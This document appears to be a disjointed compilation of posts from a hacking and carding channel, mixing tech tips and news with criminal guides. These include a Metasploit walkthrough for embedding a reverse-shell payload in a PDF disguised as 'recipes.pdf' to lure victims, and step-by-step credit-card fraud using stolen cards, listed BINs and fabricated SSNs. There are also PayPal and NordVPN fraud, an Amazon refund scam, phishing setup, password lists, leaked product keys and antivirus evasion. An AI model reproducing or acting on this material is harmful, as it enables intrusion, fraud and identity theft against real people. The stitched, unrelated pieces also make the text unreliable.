![image02](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJL3r_oiwye05yJuog_DaqsYF4b_0zfeoVvZxALnAexRIUg4j_VlB2hTYpoThIR1oajtFFPmEw0TE33qQUk_TjAAjgzaMRYwwXMCBxdJWTpd3-qpgyN9gS1tBHImhNCohJtJHGAYknL8Dy/s320/IMG_20190406_161948.jpg" width="320)
✔️ Launch The SuperSU App. ..
✔️ Tap The "Settings" Tab.
✔️ Scroll Down To The "Cleanup" Section.
✔️ Tap "Full Unroot".
✔️ Read The Confirmation Prompt And Then Tap "Continue".
✔️ Reboot Your Device Once SuperSU Closes.
⚠ Use An Unroot App If This Method Fails.
Cmsmap is a python based CMS scanner for automating the process of vulnerability assessment in most popular CMS’s. It can search for interesting files, plugins, directories and known vulnerabilities in WordPress, Joomla or Drupal.
Installing CMSmap
To install CMSmap you have to clone the repo from github.
git clone https://github.com/Dionach/CMSmap.git
After that, you need to make the right changes to the cmsmap.conf file inside the cmsmap folder. If you have Kali Linux you are good to go. If not make the right changes after the [exploit-db] option to your exploit-db path.
cd CMSmap/cmsmap nano cmsmap.conf
Cᴛʀʟ + ᴏʀ Cᴛʀʟ – ᴡɪʟʟ ᴍᴀᴋᴇ ᴛʜᴇ ᴛᴇxᴛ-ꜱɪᴢᴇ ʟᴀʀɢᴇʀ ᴏʀ ꜱᴍᴀʟʟᴇʀ.
Vᴇʀʏ ᴜꜱᴇғᴜʟ ғᴏʀ ᴍᴀᴋɪɴɢ ᴄᴏᴍᴘʟᴇᴛᴇ ᴜꜱᴇ ᴏғ ᴛᴏᴅᴀʏꜱ ʟᴀʀɢᴇ ᴍᴏɴɪᴛᴏʀꜱ.
Cᴛʀʟ + L ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ ꜱᴇʟᴇᴄᴛꜱ ᴛʜᴇ ᴀᴅᴅʀᴇꜱꜱ ʙᴀʀ.
Cᴛʀʟ + K ꜱᴇʟᴇᴄᴛꜱ ᴛʜᴇ ꜱᴇᴀʀᴄʜ ʙᴀʀ ɪɴ ғɪʀᴇғᴏx.
Cᴛʀʟ + F ʜᴇʟᴘꜱ ʏᴏᴜ ꜱᴇᴀʀᴄʜ ғᴏʀ ᴀ ᴡᴏʀᴅ ϙᴜɪᴄᴋʟʏ ᴡɪᴛʜɪɴ ᴀ ᴘᴀɢᴇ.
Cᴛʀʟ-F ɪꜱ ᴛʜᴇ ᴍᴏꜱᴛ ɪᴍᴘᴏʀᴛᴀɴᴛ ᴋᴇʏʙᴏᴀʀᴅ ꜱʜᴏʀᴛᴄᴜᴛ ғᴏʀ ʀᴇꜱᴇᴀʀᴄʜ, ᴇᴠᴇʀ.
Step 1)Run Metasploit
Step2) Find the Appropriate Exploit.
I will search metasploits database for an exploit for adobe pdf on windows, using this command:
●Code:msf > search type:exploit platform:windows adobe pdf
You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:
●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Step 3) Set the Payload
I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Step 4) Set the exploit options
First, display the required options for the exploit:
●Code:msf > exploit (adobe_pdf_embedded_exe) > show options
You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":
●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf
The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf
Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8:
●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8
Step5) Run the Exploit.
Now that all the options are set, we can run the exploit like this:
●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy as fucking smile :)
Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful the please share my effort in other groups and channels .
Creating Torrent Files: The
Basics
You might be wondering what do you need to
create a torrent, or why would you do this
in the first place? Well, there are many good
reasons why this kind of file transfer is
useful. This can be easy to see if we compare
it to traditional uploading.
Today, most people use cloud services to
upload and share files. There’s nothing wrong
with this, and there are numerous great
free-of-charge cloud services . However, let’s
say that you want to share a family movie
as soon as you can. Uploading that large file
to a cloud takes a lot of time. This means
waiting for hours, if not days, for the movie
to be fully uploaded prior to sharing. Well,
torrent eliminate that waiting time –
making your movie ready as soon as you
create and share a torrent file.
Important Requirements
Before we dive any deeper into how to
create a torrent, let’s check out the
requirements. Lucky for you, there are only
two things that you need to meet:
First, you need to have a file you’d like to
share on your computer. This can be a
single file or multiple files zipped into one
ZIP archive.
Then, you need a torrent client. In case
you don’t use one, we strongly
recommend checking out the best
torrent clients of 2018. In this article,
we are going to use uTorrent – which is
our torrent client of choice. However, the
process of creating a torrent is pretty
much the same regardless of a client you
use.
How to Create a Torrent: Quick
& Easy Guide
After a short introduction, let’s jump to
what you want to know. Here’s how to
create a torrent, the easy way. Keep on
reading.
First, launch your torrent client. As said
earlier, we are going to use uTorrent in
this article;
Now, go to File > Create New Torrent
(located in the top-left corner of the
application’s window);
Next, you need to click on either ‘ Add File ’
or ‘ Add Directory ’. In case you want to
share a single file, you can click on the
first option. The second option is used
when you want to share multiple files
located within a single folder;
Navigate to the file or directory. Then,
click on ‘Open’ in the bottom-right corner
to confirm your decision. If you’re
browsing for a directory, click on ‘Add
Directory ’;
You also need to add tracker URLs . By
default, uTorrent will add two or more
trackers which should be enough if you
simply want to share that torrent with
someone you know. However, things are
different if you want to upload your
torrent to some well-known torrent
website. For example, if you want to use
The Pirate Bay – you need to do a search
on Google about TBP’s current tracker
URL;
Finally, there is additional information like
comments, RSS, similar torrents, and
more. In general, you don’t need to fill out
these fields. Lastly, you can decide
whether you’d like to create a private or
public torrent. In case you’re not sharing
something highly sensitive, you can create
a public torrent.
That’s it! Once you’re done, click on
‘Create ’. Select where you’d like to save
the torrent and click on the ‘Save’
button.
Once you’ve created the torrent file,
remember that you are the first seeder.
This means that you need to keep uTorrent
open and make sure you’re seeding it.
How to Upload a Torrent File?
Now that you’ve created a new torrent file,
you can simply send it over to your friend.
They will be able to use it by adding the file to uTorrent – which will begin to download
the file immediately. However, you can also
upload your torrent and make it available to
just about anyone. Here’s how that can be
done.
We will show you how to upload your
torrent to The Pirate Bay – the most
popular torrent repository in the world.
So, go ahead and open The Pirate Bay using
your Web browser;
Make sure to register for a new account
using the ‘Register ’ link at the bottom of
the page. Fill out the needed information
and submit it. Then, check your email and
confirm the creation of the new account;
Return to the Home Page of TPB and click
on ‘ Login’. Enter your new credentials and
access the website;
Once you’ve accessed your account, click
on ‘ Upload Torrent’ at the bottom of the
page;
Finally, fill out the needed information .
You have to upload the newly created
torrent file, enter a name, category, and
description. Once you’re done, click on the
‘Add to Index ’ button and your torrent
will become accessible to anyone.
Once again, make sure that your uTorrent
is open and that you’re seeding the newly
created torrent. This will allow other
people to access it, download it to their
computers, and become seeders
themselves.
ᴛʜɪs ɪs ᴀɴ ɪᴍᴘᴏʀᴛᴀɴᴛ ᴘᴀʀᴛ! ʏᴏᴜ ɴᴇᴇᴅ ᴀ ᴘᴏᴡᴇʀғᴜʟ ᴘᴀssᴡᴏʀᴅ ʟɪsᴛ ᴛᴏ ᴄʀᴀᴄᴋ ᴠᴘs!
ғᴏʀ ᴍᴀᴋɪɴɢ ᴛʜᴀᴛ ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴘᴀʏ ᴀᴛᴛᴇɴᴛɪᴏɴ ᴀɴᴅ ʙᴇ ᴘᴀᴛɪᴇɴᴛ! ᴄᴀᴜsᴇ ɪᴛ ᴛᴀᴋᴇs ᴛɪᴍᴇ!
ᴡᴇ ʜᴀᴠᴇ ᴍᴀɴʏ ᴛʏᴘᴇs ᴏғ ᴘᴀssᴡᴏʀᴅ ʟɪsᴛ! ʟɪᴋᴇ ɴᴀᴍᴇ, ʟᴏᴄᴀᴛɪᴏɴ, ᴄᴀʀ ɴᴀᴍᴇ, ʀᴀɴᴅᴏᴍ ɴᴜᴍʙᴇʀs, ᴀɴᴅ ᴍᴏʀᴇ!
ғᴏʀ ᴇxᴀᴍᴘʟᴇ! ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ᴄʀᴀᴄᴋ ɢᴇʀᴍᴀɴʏ ᴅᴀᴛᴀᴄᴇɴᴛᴇʀs! ʏᴏᴜ sʜᴏᴜʟᴅ ᴍᴀᴋᴇ ᴀ ᴘᴀssᴡᴏʀᴅ ʟɪsᴛ ʙʏ ᴜsɪɴɢ ᴛʜᴇɪʀ ғᴀᴍᴏᴜs ᴘʟᴀᴄᴇ's ɴᴀᴍᴇs ᴀɴᴅ ᴍᴏʀᴇ! ᴏʀ, ʏᴏᴜ ᴄᴀɴ ᴜsᴇ ᴘᴜʙʟɪᴄ ᴘᴀssᴡᴏʀᴅs ʟɪᴋᴇ ᴀᴅᴍɪɴ, ᴘᴀssᴡᴏʀᴅ123, ɴᴜᴍʙᴇʀs ᴀɴᴅ ᴍᴏʀᴇ ...
admin123
admin@123
admin#123
~admin_123
admin_2018
admin_2017
admin__!@#
!admin!
Security researchers discovered 15 malicious wallpaper apps that running Ad Fraud Scheme from Google play store and current these apps downloaded 222,200 Android users.
Cybercriminals frequently using Play store to upload malicious apps that often delivering malware and committing ads frauds.
Italy, Taiwan, the United States, Germany and Indonesia with the most infections records by this malicious wallpaper apps.
These Android apps are providing attractive wallpapers that contain highest reviews which is identified as fake review to gain the more trust from users.
1. What Is Ethical Hacking And Penetration Testing, And How Can You Use It
2. Introduction From Your Co-Instructor Snehil Khare about Ethical Hacking
3. Environment setup lecture
4. Stealing facebook credentials via phishing
5. How to defend against phishing attacks
6. User Browser hacking using Beef exploitation framework
7. How to defend against browser attacks
8. User machine hacking via word and excel documents
9. Hacking android phones for fun and profit
10. Backdooring android apps for Profit
11. How to defend against android attacks
12. Chaining multiple commands together
13. Download and build the target
14. Hacking with Kali Linux your target system
Drive Link -- https://goo.gl/sDXgSF
#Technews
After introducing the Picture-in-Picture (PiP) feature to the final build of WhatsApp, the instant messaging platform has brought the same to WhatsApp Web.
PiP basically lets you open a media link from YouTube, Instagram, Facebook and Tumblr without actually leaving WhatsApp. With the new feature, you can watch the videos in a box hovering over the chat window, saving you multiple taps on the recents button.
You can see if the feature works for you by looking out for a blurred thumbnail on any shared media link on WhatsApp. If you can spot it in the message, the media is PiP ready. If not, you’ll have to open it in the native media app or a browser.
The G-Shock is so nerdy that it has become cool, and this latest model, the GMWB5000GD-9, is no exception. Based on the original G-Shock models, this decidedly unsmart (but not dumb) watch features solar charging, atomic timekeeping and a simple Bluetooth connection to your phone. Plus, now it comes in gold or silver-toned metal, a decided departure for the decades-old brand.
This wild redesign takes cues from a solid-gold prototype designed by Casio’s Ibe Kikuo. That blinged-out watch, which could hit the market but will be as expensive as an entire Casio display case, is a bit much. However, these two steel models are quite exciting and very luxe.
Blind SQL Injection Tool Download in Ruby
BSQLinjector is an easy to use Blind SQL Injection tool in Ruby, that uses blind methods to retrieve data from SQL databases.
What is Blind SQL Injection?
Blind SQL Injection is a type of SQL Injection (SQLi) attack that asks the database true or false questions and determines the answer based on the application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.
You can download BSQLinjector here:
https://raw.githubusercontent.com/enjoiz/BSQLinjector/master/BSQLinjector.rb
Trick to Browse Forums without login or register in forum
Whenever you visit new forum it will ask you to register or login to view the post. For just seeing only one post ,we don’t need to waste time with registering in that forum. Here is simple trick or hack whatever you call to view the post of forum without registering.
The simple logic is that All websites and forums will block unregistered users, but they won’t block Google Bot. we can change our userAgent with the google bot user agent and easily browse the forums.
Visit This site http://chrispederick.com/work/user-agent-switcher/ . It will provide you the mozilla user agent add on for you. click the download add on. That will bring you to the mozila add on page for user Agent
Download the addon and install it in mozila. now restart the browser.
*Now go to Tools menu and select “Default User Agent”
*Select “User Agent Switcher”
*Now select “Options”
TOP 15 FREE HOSTING PROVIDER IN 2K18
1:- 000webhost.com
2:- Freehostia.com
3:- Jimdo.com
4:- FreeHosting.com
5:- xtreemhost.com
6:- Zymic.com
7:- Byethost.com
8:- 110MB.com
9:- AwardSpace.com
10:- 1FreeHosting.com
11:- FreeHostingEU.com
12:- Uhostfull.com
13:- 50Webs.com
14:- ZettaHost.com
15:- x10hosting.com
CC to BTC method
site : cex.io
TIPS : USE VPN / PRIVATE PROXY USA TO CARD THE SITE
CC BINS 2018 WORKING GOOD :
410039 /483313 /426684 /441712 /481583 /426684 /480365 /427138 /432630 /438852
1) Go to site : cex.io
2) Register for an account with an free email from 10minutemail.net
3) After you did the account on the site go verify the account with email
4) You have to fund your account with money from credit cards you have public or private works both
5) Click on Deposit and you will be redirected to payment option
( See here example http://prntscr.com/c26c4n )
6) In this page you have to put the money you want to deposit and info from credit card you have
( See here example http://prntscr.com/c26d7k )
7) Then fill the billing and other sections with fake info's from this site : fakenamegenerator.com
8) For SSN section you have to do simple things
9) In fakenamegenerator.com site you have on fake info's a section that is SSN
( See here example http://prntscr.com/c26fas )
10) You take that 317-66-XXXX and where it's X letter you put 4 random numbers it doesn't count
11) If you want to be more sure i have those sites that help you to get SSN and help you to get a verified SSN
SITES FOR SSN VERIFICATION :
https://www.ssn-check.org/recent/
https://www.ssn-verify.com/bulk-veri...ck.org&pos=top
http://www.searchbug.com/peoplefinde...-ssn-free.aspx
12) After that click PROCEED and there you go
13) Your account will be funded with 50$ from that credit card you got from altenen public or private from shops
14) Now you go to home page and click on BUY/SELL
15) You have options of buying bitcoins worth : 100$ / 200$ / 500$ / 1,000$
16) Go down side of page and put your amount like 50$
( See here example http://prntscr.com/c26isw )
17) Now click buy and they will take that 50$ from your balance account and will give you bitcoins
18) You will get bitcoins in account and go and click on WITHDRAW
19) Click on BTC to be payed in BITCOINS
20) Put your BTC WALLET and put amount you want to withdraw
21) After click on Withdraw button and the bitcoins will be transferred instant to your address
. www.tunnelr.com .
. www.createssh.com .
. www.brssh.com .
. www.sshudp.com .
. www.vpnjantit.com .
. www.contassh.com .
. www.fastssh.com .
. www.akashiro.co.id .
. www.freevpn.us .
. www.globalssh.com .
. www.topvpnssh.com .
. www.jetssh.com .
. www.portssh.com .
. www.sshkit.com .
. www.speedssh.com .
. www.buatssh.top .
. www.lindofull.com .
. www.fullssh.com .
. www.lowframe.com .
. www.mytunneling.com .
. www.skyssh.com .
. www.bestvpnssh.com .
. www.dropbear.net .
. www.cloudssh.us .
. www.boostvpn.us .
. www.createssh.com .
. www.vpnjantit.com .
. www.vpnbook.com .
. www.contassh.com .
. www.sshagan.net .
. www.sshudp.com .
. www.serverssh.com .
. www.servervpn.net .
. www.goodssh.com .
. www.maxssh.com .
. www.tcpvpn.com .
. www.cloudssh.us .
. www.fullssh.com .
. www.highssh.com .
. www.sshdropbear.net .
. www.ciscossh.com .
. www.criarssh.com .
. www.free-ssh.xyz .
. www.freessh.me .
. www.sshservers.com .
. www.interssh.com .
. www.goodssh.com .
. www.squidssh.com .
. www.traceless.me .
. www.t.me/Payloadhttp .
. www.ssh69.com .
. www.cyberssh.com .
. www.spotssh.com .
. www.lastssh.com .
. www.putarotakssh.com .
. www.flyssh.com .
Nord VPN 2Year Trick
1) It is not necessary to use VPN
2) Use Incognito Mode
We manage a Paypal.de, we register with temporary or invented mail.
Temporary Mail: https://temp-mail.org/es/
Something like this will come out: (Fill in here: http://www.fake-it.cc/)
- Your name: First Name
- Last Name: Second Name
- Geburtsdatum: Date of Birth (Put Date of birth from 1940 to 1960)
- StraBe und Hausnummer: The Direction or Direction
- Adresszusatz: Leaving it blank is optional.
- PLZ: Postal Code
- ORT: State of the postal code. (Les automatically appears)
- Telefonnummer: Phone Number, http://www.es.receive-sms-online.info/ We copy the number of Germany
➕Now it's time to associate a Banking Account
- First Place the Date of Birth.
- Bankleitzahl: Banking Code, 8-digit son in fake-it.cc search Where BLZ Dice: http://en.fakenamegenerator.com/
- Kontonummer: NAME OF ACCOUNT Are 10 digits in fake-it.cc search Where dice Kontonr
(It is not necessary to confirm the bank account, if it is the sale of error because it is already used generate another)
⭕They already have their PayPal account with a fake bank account Now comes the last step.⭕
⭕We are going to: https://nordvpn.com/special/2y-deal/?nvp...0wodAkcPAA
➖They give Buy or Buy Now⭕
❕Where? If the temporary mail is necessary because they have to confirm the account, they post the key mail and
Set Paypal payment method, accept the Terms and give you buy now Send it to the paypal page
Put your account and log in.
🔰If you get the payment With a card below you will get it THIS: By Uberweisung Zahlen you are given hay
and from the Send to the Bank Account they accept the payment and they have NORDVPN for 2 years🔰
1. Order Any Product On COD [ Order Only Prime Eligible Product & Return Policy Product ]
2 . When Your Order Out for Delivey then You Will Get A Pay Link On SMS & Email
3. Login Your Amazon Pay Balance Account In Any Browser
4. Paste Pay Link In Browser In Which You Login Your Amazon Pay Balance Account & Pay for the Order
5. After Payment You Will Get A Payment Code. Keep it Because Delivery Boy Need this Code
6. After Delivery Of Order , Simply return and choose refund to your Bank
Brosec is an open source terminal based tool to help all the security professionals generate the right payloads and commands. It can show you all the most popular commands you can use for information gathering, Linux, Windows, web and utilize payloads.
Installing Brosec
Let’s clone the repository, first.
git clone https://github.com/gabemarshall/Brosec.git
After that install the missing dependencies.
apt-get install npm npm install
Now, you are good to go
According to a recent report, researchers at Trend Micro have found some malicious Twitter memes that hide malware. When a victim downloads such memes, the malware reaches the victim’s device and executes code without alerting the user.
The researchers explained that the hackers exploit this trick using Steganography. In this method, the author hides a malicious payload in an image to evade cybersecurity measures. According to Trend Micro, the hackers may now exploit the same trick via Twitter memes as well.
So stay alert if you are on twitter .
Child-tracking smartwatches provide a convenient means of monitoring a child’s safety for parents. However, if the devices have security flaws, they could risk the safety of kids. Recently, researchers found some notable vulnerabilities in MiSafes child-tracking smartwatches that make these trackers prone to hacks.
Researchers from Pen Test Partners found some serious security issues in MiSafes child-tracking smartwatches. According to their findings, the flaws can allow an attacker snoop into the smartwatch system, and compromise your child’s safety.
According to researchers, exploiting the bugs could let them access the target child’s GPS coordinates, send audio messages to them or call them, make secret one-way calls for spying, or retrieve a child’s personal details, like name, age, gender, weight, and photograph(s).
The researchers and the BBCattempted to contact the vendors, but received no response.
ᴛᴏᴅᴀʏ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴅɪsᴄᴜss sᴏᴍᴇ ᴇᴀsʏ ᴀɴᴅ ʜɪɢʜʟʏ ᴇғғᴇᴄᴛɪᴠᴇ ɢᴜɪᴅᴇʟɪɴᴇ ᴛᴏ sᴛᴀʀᴛ ᴀ ᴄʏʙᴇʀ sᴇᴄᴜʀɪᴛʏ ᴄᴀʀᴇᴇʀ:
1.ᴅᴏ ʏᴏᴜʀ ᴏᴡɴ ʀᴇsᴇᴀʀᴄʜ
ᴛʜᴇ ᴄʏʙᴇʀ sᴇᴄᴜʀɪᴛʏ ғɪᴇʟᴅ ɪs ᴀʟʟ ᴀʙᴏᴜᴛ ɴᴇᴡ ᴛʀᴇɴᴅs ᴀɴᴅ ᴛᴇᴄʜɴɪǫᴜᴇs, sᴏ ɪᴛ ɪs ɴᴇᴄᴇssᴀʀʏ ᴛᴏ ᴅᴏ ʏᴏᴜʀ ᴏᴡɴ ʀᴇsᴇᴀʀᴄʜ ᴛᴏ ᴇxᴘʟᴏʀᴇ ɴᴇᴡ ᴛʀᴇɴᴅs, ᴛᴇᴄʜɴɪǫᴜᴇs ᴀɴᴅ ᴛᴇᴄʜɴᴏʟᴏɢɪᴇs ɪɴ ᴛʜᴇ ғɪᴇʟᴅ ᴏғ ᴄʏʙᴇʀ sᴇᴄᴜʀɪᴛʏ. ɪᴛ’s ᴀɴ ᴏɴɢᴏɪɴɢ ᴘʀᴏᴄᴇss ɪғ ʏᴏᴜ ᴄᴏɴsɪᴅᴇʀ ᴄʏʙᴇʀ sᴇᴄᴜʀɪᴛʏ ғɪᴇʟᴅ ғᴏʀ ʏᴏᴜʀ ғᴜᴛᴜʀᴇ.
2.sᴛᴜᴅʏ ʜᴀʀᴅ
ɪɴ ᴛʜᴇ ғɪᴇʟᴅ ᴏғ ᴄʏʙᴇʀ sᴇᴄᴜʀɪᴛʏ, ʏᴏᴜ ᴍᴜsᴛ ʙᴇ ᴜᴘ ᴛᴏ ᴅᴀᴛᴇ ᴛᴏ ɴᴇᴡ ʀᴇsᴇᴀʀᴄʜ ᴀɴᴅ sᴛᴜᴅɪᴇs. ɪɴ-ᴅᴇᴘᴛʜ sᴛᴜᴅʏ ɪs ᴛʜᴇ ᴏɴʟʏ ᴋᴇʏ ᴛᴏ ɢʀᴏᴡ ɪɴ ᴛʜɪs ғɪᴇʟᴅ. ɴᴏʙᴏᴅʏ ᴄᴀɴ ᴇxᴘᴇᴄᴛ sᴜᴄᴄᴇss ᴏᴠᴇʀɴɪɢʜᴛ, ᴛʜɪs ғɪᴇʟᴅ ʀᴇǫᴜɪʀᴇᴅ ᴅᴇᴅɪᴄᴀᴛᴇᴅ ʜᴀʀᴅ ᴡᴏʀᴋ ᴀɴᴅ ᴋɴᴏᴡʟᴇᴅɢᴇ ᴛᴏ sᴜʀᴠɪᴠᴇ.
ᴛʜᴇsᴇ ᴀʀᴇ sᴏᴍᴇ ʙᴀsɪᴄ sᴛʀᴀᴛᴇɢʏ ᴛᴏ ʙᴇᴄᴏᴍᴇ ᴀ ᴄʏʙᴇʀ sᴇᴄᴜʀɪᴛʏ ᴘʀᴏғᴇssɪᴏɴᴀʟ ʙᴜᴛ ɪs ɴᴏᴛ ʟɪᴍɪᴛᴇᴅ ᴛᴏ ᴛʜᴇsᴇ ᴏɴʟʏ, ʏᴇᴛ ʏᴏᴜ ᴍᴜsᴛ ғᴏʟʟᴏᴡ ᴛʜᴇsᴇ ᴛᴏ ɢᴇᴛ sᴛᴀʀᴛᴇᴅ.
Auto Like, Followers & Simple themes Of Matrik+mp3
# ► Use the browser "Mozilla Firefox" or google chrome
1. Open the blue link -> http://goo.gl/UyWnne Copy all of the code by pressing CTRL + A then Ctrl + C
2. Once copied, Back to your Facebook
3. ►mozilla firefox press CTRL + Shift + K on the keyboard simultaneously.
►google chrome press CTRL + Shift + J
4. Then PASTE .. (How to paste the code themselves just press CTRL + V on the keyboard.)
5. Jump continue Press "ENTER"
Skip Proccess Here > http://adf.ly/mV4nM
6. Done .. See how many followers you
For
stackoverflow
wordpress
github
Installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ git clone https://github.com/UndeadSec/SocialFish.git
$ cd SocialFish
$ chmod +x *
$ pip2 install -r requirements.txt
usage :
$ python2 SocialFish.py
Now select your target and it will generate an url using Ngrok
then it send to victem
1. Log in to
** http://www.e-coin.io/ and Create an account. You can use fake credentials
2. Download WireX App On Your SmartPhone ( Playstore / appstore )
3. Login To The App Using Your E-Coin.io Login
( Use All Fake Info When Doing This Stuff )
4. Create A New USD Card on WireX App . Make It A USD VCC (Virtual Credit Card)
5. Go Back To E-Coin.io or the WireX app;
Select Send CVV ( The CC # , Exp Date and CVV Numbers Will Be Emailed To You )
You now have a Virtual credit card that you can use or top it up with BITCOINS or any service that requires one.
More tutorials will follow on how to leverage it to your advantage
Today i want to show you guys how to create HQ Google dorks for SQLi Dumper!
This tutorial is very easy to understand and i'll try to update it everytime after updates have been release, some used services closed, etc.
Lets start:
1. Think about what kind of combo you want to have at the end:
If you need gaming combos you should use some gaming related keywords.
If you need shopping combos you should use some shopping related keywords.
But if you need mixed combos for probably different kind of websites you can mix your keywords.
But what Keywords should you use?
That's easy - but please dont use keywords like "Gaming", "Fortnite", if you want gaming combos for example.
Try it like me:
Search on Google for "Keyword" websites.
Here for example are some:
https://keywordtool.io/ https://kwfinder.com/ https://searchvolume.io/
In this example i want to create some gaming combos which i can use later on some gaming related websites.
So i visit https://kwfinder.com/, enter my main keyword, click on autocomplete at the top and start search.
In this example it's "Fortnite". Now the website shows me about 100 different keywords which are related to this.
I'll choose some keywords which are a bit longer as the main keyword, probably 1-2 words more.
This will be: "Fortnite Tracker", "Fortnite Skins" and "Fornite patch notes".
2. Now we'll create some dorks with these Keywords:
Download the DorkGeneraor "PefectDork"
Enter your keywords which you've researched in Step 1 Like this:
Fortnite Tracker,Fortnite Skins,Fortnite Patchnotes
Hit enter and your dorks will be automatically created.
3. Now you can use these dorks in SQLi Dumper etc and you'll definitely get a bunch of URLs and also unique hits.
A programming language is simply a set of rules that tells a computer system what to do and how to do it. It gives the computer instructions for performing a particular task. A programming language consists of a series of well-defined steps which the computer must strictly follow in order to produce the desired output. Failure to follow the steps as it has been defined will result in an error and sometimes the computer system won’t perform as intended.
🔺Markup Languages🔺
From the name, we can easily tell that a markup language is all about visuals and looks. Basically, this is the primary role of markup languages. They are used for the presentation of data. They determine the final outlook or appearance of the data that needs to be displayed on the software. Two of the most powerful markup languages are HTML and XML. If you have used both of these two languages, you should be aware of the impact that they can have on a website in terms of the aesthetics.
🔺Scripting Languages🔺
A scripting language is a type of language that is designed to integrate and communicate with other programming languages. Examples of commonly used scripting languages include JavaScript, VBScript, PHP among others. There are mostly used in conjunction with other languages, either programming or markup languages. For example, PHP which is a scripting language is mostly used in conjunction with HTML. It is safe to say that all scripting languages are programming languages, but not all programming languages are scripting languages.
In this practical scenario, we are going to crack Windows account with a simple password. Windows uses NTLM hashes to encrypt passwords. We will use the NTLM cracker tool in Cain and Abel to do that.
Cain and Abel cracker can be used to crack passwords using;
Dictionary attack
Brute force
Cryptanalysis
We will use the dictionary attack in this example. You will need to download the dictionary attack wordlist here 10k-Most-Common.zip
For this demonstration, we have created an account called Accounts with the password qwerty on Windows 7.
Password cracking steps
Open Cain and Abel, you will get the following main screen
The local user accounts will be displayed as follows. Note the results shown will be of the user accounts on your local machine.
Note: the time taken to crack the password depends on the password strength, complexity and processing power of your machine.
If the password is not cracked using a dictionary attack, you can try brute force or cryptanalysis attacks.
Summary
Password cracking is the art of recovering stored or transmitted passwords.
Password strength is determined by the length, complexity, and unpredictability of a password value.
Common password techniques include dictionary attacks, brute force, rainbow tables, spidering and cracking.
Password cracking tools simplify the process of cracking passwords.
Windows Server 2016 Datacenter
CB7KF-BWN84-R7R2Y-793K2-8XDDG
Windows Server 2016 Standard
WC2BQ-8NRM3-FDDYY-2BFGV-KHKQY
Windows Server 2016 Essentials
JCKRF-N37P4-C2D82-9YXRT-4M63B
Windows 10 Education :
NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Education :
N2WH4N-8QGBV-H22JP-CT43Q-MDWWJ
Windows 10 Enterprise 2015 LTSB :
WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2015 LTSB :
N2F77B-TNFGY-69QQF-B8YKP-D69TJ
Windows 10 Product Keys:
Windows 10 Professional :
W269N-WFGWX-YVC9B-4J6C9-T83GX
Windows 10 Professional :
NMH37W-N47XK-V7XM9-C7227-GCQG9
Windows 10 Enterprise:
NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Enterprise:
NDPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Kalitorify is a shell based script for Kali Linux. It uses iptables and TOR to create a transparent proxy. In simple terms, this means that all your network traffic can be redirected through TOR. It is based on Parrot AnonSurf , which is a popular module in Parrot OS to ‘torify’ your traffic.
Installing Kalitorify
To install Kalitorify, clone the repository from Github.
git clone https://github.com/brainfucksec/kalitorify.git
You also need to install TOR.
apt-get update && apt-get install tor
Then go to the folder and follow the instructions.
cd kalitorofy/ make install reboot
Based on python, the Veil-Framework is one of the most popular tools for Anti-Virus evasion. You can generate many different Metasploit payloads in c, python, ruby, powershell and more. The advantage of this tool is that you can add-up a layer of encryption to your payloads. With the right optimization you can bypass some common AV solutions.
Veil Installation
Veil comes with the Kali-Linux distribution and the installation is pretty easy. All you have to do is shown below.
apt-get update apt-get install veil
If you don’t have Kali you can install it from Github and run the setup file.
git clone https://github.com/Veil-Framework/Veil.git cd Veil/setup/ ./setup.sh --force --silent
Client using a Proxy Server. So, We’ll use it for Hiding Our Main Location and Proving a Fake Location to the location of Credit Card’s Holder for Making the Transaction Successful. Generally, It is more Secure than the VPN, as It won’t leak your DNS Details.
RDP
[RDP Also knows as Remote Desktop Protocol, Which Allows you to graphically connect with a Computer Over a Network. It will connect you with any Computer Connected as an RDP on Any Country and Make yourself Anon. This is not Required but you can Use it for Safety Purposes.
Drop
Well, It is a Service, Which usage for getting Shipping Address for Carding. Suppose If you are from Pakistan And Carding with a US Credit Card. If you’ll add Delivery Address as Pakistan then There are so many chances to Cancel the Order, But If you will use a US Address, then there will be 95% Chances of Order Success. If you have any Relatives their than It is OK, But If you don’t have anyone than This service will help you. It will provide you an Address of that country, And Take Delivery and then Send that Parcel to you. it charges some money for it, But It will be worth in Investing in it.
Credit Card
This is the Essential Part of Carding, If you Understand what is it, Half of your Work will End Up Here. Whenever you’ll buy a Credit Card from any Online Shop, you will receive it in a Virtual Notepad File or Something with the Below format.
Types of Credit Cards
Below I Have Added some types of CC, You’ll Get while Buy it from Any Shop.
Regular Credit Card
NAME:
ADDRESS:
CITY:
STATE:
ZIP CODE:
TEL. BILLING NUMBER:
CARD NUMBER:
CARD EXP DATE:
CVV CODE:
Well, This is the Minimum Information you’ll get from a CC whenever you’ll Buy it. If you’ll not Get any of these Details, Then you can’t do anything with that CC. You are Out of Luck this Time. With this CC you can Card Simple Sites.
Partial Full-Info CC
In these Card, You will get some Additional Information with the Details Mention Above. This Information are
Social Security Number (SSN):
